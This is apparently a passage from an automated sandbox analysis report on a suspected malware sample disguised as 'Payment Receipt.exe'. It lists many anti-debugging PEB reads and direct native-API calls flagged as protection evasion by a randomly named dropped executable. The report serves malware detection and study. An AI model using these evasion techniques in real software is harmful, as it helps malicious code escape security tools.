              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C45B1 mov eax, dword ptr fs:[00000030h]0_2_015C45B1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162C460 mov ecx, dword ptr fs:[00000030h]0_2_0162C460
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159645D mov eax, dword ptr fs:[00000030h]0_2_0159645D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C245A mov eax, dword ptr fs:[00000030h]0_2_015C245A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE443 mov eax, dword ptr fs:[00000030h]0_2_015DE443
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CA470 mov eax, dword ptr fs:[00000030h]0_2_015CA470
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CA470 mov eax, dword ptr fs:[00000030h]0_2_015CA470
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CA470 mov eax, dword ptr fs:[00000030h]0_2_015CA470
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165A456 mov eax, dword ptr fs:[00000030h]0_2_0165A456
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01626420 mov eax, dword ptr fs:[00000030h]0_2_01626420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D8402 mov eax, dword ptr fs:[00000030h]0_2_015D8402
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D8402 mov eax, dword ptr fs:[00000030h]0_2_015D8402
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D8402 mov eax, dword ptr fs:[00000030h]0_2_015D8402
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E420 mov eax, dword ptr fs:[00000030h]0_2_0159E420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E420 mov eax, dword ptr fs:[00000030h]0_2_0159E420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159E420 mov eax, dword ptr fs:[00000030h]0_2_0159E420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159C427 mov eax, dword ptr fs:[00000030h]0_2_0159C427
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A04E5 mov ecx, dword ptr fs:[00000030h]0_2_015A04E5
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162A4B0 mov eax, dword ptr fs:[00000030h]0_2_0162A4B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D44B0 mov ecx, dword ptr fs:[00000030h]0_2_015D44B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A64AB mov eax, dword ptr fs:[00000030h]0_2_015A64AB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165A49A mov eax, dword ptr fs:[00000030h]0_2_0165A49A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0750 mov eax, dword ptr fs:[00000030h]0_2_015A0750
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2750 mov eax, dword ptr fs:[00000030h]0_2_015E2750
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2750 mov eax, dword ptr fs:[00000030h]0_2_015E2750
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D674D mov esi, dword ptr fs:[00000030h]0_2_015D674D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D674D mov eax, dword ptr fs:[00000030h]0_2_015D674D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D674D mov eax, dword ptr fs:[00000030h]0_2_015D674D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A8770 mov eax, dword ptr fs:[00000030h]0_2_015A8770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0770 mov eax, dword ptr fs:[00000030h]0_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01624755 mov eax, dword ptr fs:[00000030h]0_2_01624755
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162E75D mov eax, dword ptr fs:[00000030h]0_2_0162E75D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0710 mov eax, dword ptr fs:[00000030h]0_2_015A0710
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D0710 mov eax, dword ptr fs:[00000030h]0_2_015D0710
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161C730 mov eax, dword ptr fs:[00000030h]0_2_0161C730
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC700 mov eax, dword ptr fs:[00000030h]0_2_015DC700
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D273C mov eax, dword ptr fs:[00000030h]0_2_015D273C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D273C mov ecx, dword ptr fs:[00000030h]0_2_015D273C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D273C mov eax, dword ptr fs:[00000030h]0_2_015D273C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC720 mov eax, dword ptr fs:[00000030h]0_2_015DC720
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC720 mov eax, dword ptr fs:[00000030h]0_2_015DC720
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162E7E1 mov eax, dword ptr fs:[00000030h]0_2_0162E7E1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AC7C0 mov eax, dword ptr fs:[00000030h]0_2_015AC7C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A47FB mov eax, dword ptr fs:[00000030h]0_2_015A47FB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A47FB mov eax, dword ptr fs:[00000030h]0_2_015A47FB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016207C3 mov eax, dword ptr fs:[00000030h]0_2_016207C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C27ED mov eax, dword ptr fs:[00000030h]0_2_015C27ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C27ED mov eax, dword ptr fs:[00000030h]0_2_015C27ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C27ED mov eax, dword ptr fs:[00000030h]0_2_015C27ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016547A0 mov eax, dword ptr fs:[00000030h]0_2_016547A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164678E mov eax, dword ptr fs:[00000030h]0_2_0164678E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A07AF mov eax, dword ptr fs:[00000030h]0_2_015A07AF
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166866E mov eax, dword ptr fs:[00000030h]0_2_0166866E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166866E mov eax, dword ptr fs:[00000030h]0_2_0166866E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BC640 mov eax, dword ptr fs:[00000030h]0_2_015BC640
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D2674 mov eax, dword ptr fs:[00000030h]0_2_015D2674
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA660 mov eax, dword ptr fs:[00000030h]0_2_015DA660
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA660 mov eax, dword ptr fs:[00000030h]0_2_015DA660
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2619 mov eax, dword ptr fs:[00000030h]0_2_015E2619
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B260B mov eax, dword ptr fs:[00000030h]0_2_015B260B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E609 mov eax, dword ptr fs:[00000030h]0_2_0161E609
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A262C mov eax, dword ptr fs:[00000030h]0_2_015A262C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE627 mov eax, dword ptr fs:[00000030h]0_2_015BE627
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D6620 mov eax, dword ptr fs:[00000030h]0_2_015D6620
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D8620 mov eax, dword ptr fs:[00000030h]0_2_015D8620
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E6F2 mov eax, dword ptr fs:[00000030h]0_2_0161E6F2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E6F2 mov eax, dword ptr fs:[00000030h]0_2_0161E6F2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E6F2 mov eax, dword ptr fs:[00000030h]0_2_0161E6F2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E6F2 mov eax, dword ptr fs:[00000030h]0_2_0161E6F2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016206F1 mov eax, dword ptr fs:[00000030h]0_2_016206F1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016206F1 mov eax, dword ptr fs:[00000030h]0_2_016206F1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA6C7 mov ebx, dword ptr fs:[00000030h]0_2_015DA6C7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA6C7 mov eax, dword ptr fs:[00000030h]0_2_015DA6C7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4690 mov eax, dword ptr fs:[00000030h]0_2_015A4690
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4690 mov eax, dword ptr fs:[00000030h]0_2_015A4690
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D66B0 mov eax, dword ptr fs:[00000030h]0_2_015D66B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC6A6 mov eax, dword ptr fs:[00000030h]0_2_015DC6A6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01644978 mov eax, dword ptr fs:[00000030h]0_2_01644978
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01644978 mov eax, dword ptr fs:[00000030h]0_2_01644978
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162C97C mov eax, dword ptr fs:[00000030h]0_2_0162C97C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01620946 mov eax, dword ptr fs:[00000030h]0_2_01620946
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674940 mov eax, dword ptr fs:[00000030h]0_2_01674940
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E096E mov eax, dword ptr fs:[00000030h]0_2_015E096E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E096E mov edx, dword ptr fs:[00000030h]0_2_015E096E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E096E mov eax, dword ptr fs:[00000030h]0_2_015E096E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C6962 mov eax, dword ptr fs:[00000030h]0_2_015C6962
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C6962 mov eax, dword ptr fs:[00000030h]0_2_015C6962
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C6962 mov eax, dword ptr fs:[00000030h]0_2_015C6962
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598918 mov eax, dword ptr fs:[00000030h]0_2_01598918
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598918 mov eax, dword ptr fs:[00000030h]0_2_01598918
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162892A mov eax, dword ptr fs:[00000030h]0_2_0162892A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0163892B mov eax, dword ptr fs:[00000030h]0_2_0163892B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E908 mov eax, dword ptr fs:[00000030h]0_2_0161E908
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161E908 mov eax, dword ptr fs:[00000030h]0_2_0161E908
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162C912 mov eax, dword ptr fs:[00000030h]0_2_0162C912
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162E9E0 mov eax, dword ptr fs:[00000030h]0_2_0162E9E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AA9D0 mov eax, dword ptr fs:[00000030h]0_2_015AA9D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D49D0 mov eax, dword ptr fs:[00000030h]0_2_015D49D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016369C0 mov eax, dword ptr fs:[00000030h]0_2_016369C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D29F9 mov eax, dword ptr fs:[00000030h]0_2_015D29F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D29F9 mov eax, dword ptr fs:[00000030h]0_2_015D29F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166A9D3 mov eax, dword ptr fs:[00000030h]0_2_0166A9D3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016289B3 mov esi, dword ptr fs:[00000030h]0_2_016289B3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016289B3 mov eax, dword ptr fs:[00000030h]0_2_016289B3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016289B3 mov eax, dword ptr fs:[00000030h]0_2_016289B3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A09AD mov eax, dword ptr fs:[00000030h]0_2_015A09AD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A09AD mov eax, dword ptr fs:[00000030h]0_2_015A09AD
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A0 mov eax, dword ptr fs:[00000030h]0_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4859 mov eax, dword ptr fs:[00000030h]0_2_015A4859
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A4859 mov eax, dword ptr fs:[00000030h]0_2_015A4859
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D0854 mov eax, dword ptr fs:[00000030h]0_2_015D0854
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162E872 mov eax, dword ptr fs:[00000030h]0_2_0162E872
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162E872 mov eax, dword ptr fs:[00000030h]0_2_0162E872
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01636870 mov eax, dword ptr fs:[00000030h]0_2_01636870
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01636870 mov eax, dword ptr fs:[00000030h]0_2_01636870
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B2840 mov ecx, dword ptr fs:[00000030h]0_2_015B2840
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164483A mov eax, dword ptr fs:[00000030h]0_2_0164483A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164483A mov eax, dword ptr fs:[00000030h]0_2_0164483A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov eax, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov eax, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov eax, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov ecx, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov eax, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2835 mov eax, dword ptr fs:[00000030h]0_2_015C2835
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA830 mov eax, dword ptr fs:[00000030h]0_2_015DA830
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162C810 mov eax, dword ptr fs:[00000030h]0_2_0162C810
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166A8E4 mov eax, dword ptr fs:[00000030h]0_2_0166A8E4
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE8C0 mov eax, dword ptr fs:[00000030h]0_2_015CE8C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC8F9 mov eax, dword ptr fs:[00000030h]0_2_015DC8F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC8F9 mov eax, dword ptr fs:[00000030h]0_2_015DC8F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016708C0 mov eax, dword ptr fs:[00000030h]0_2_016708C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0887 mov eax, dword ptr fs:[00000030h]0_2_015A0887
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162C89D mov eax, dword ptr fs:[00000030h]0_2_0162C89D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01598B50 mov eax, dword ptr fs:[00000030h]0_2_01598B50

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtCreateKey: Direct from: 0x76F02C6C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtSetInformationThread: Direct from: 0x76F02B4C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQuerySystemInformation: Direct from: 0x76F048CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtOpenSection: Direct from: 0x76F02E0C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtSetInformationThread: Direct from: 0x76EF63F9
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtCreateFile: Direct from: 0x76F02FEC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtOpenFile: Direct from: 0x76F02DCC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQueryInformationToken: Direct from: 0x76F02CAC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtTerminateThread: Direct from: 0x76F02FCC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtOpenKeyEx: Direct from: 0x76F02B9C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
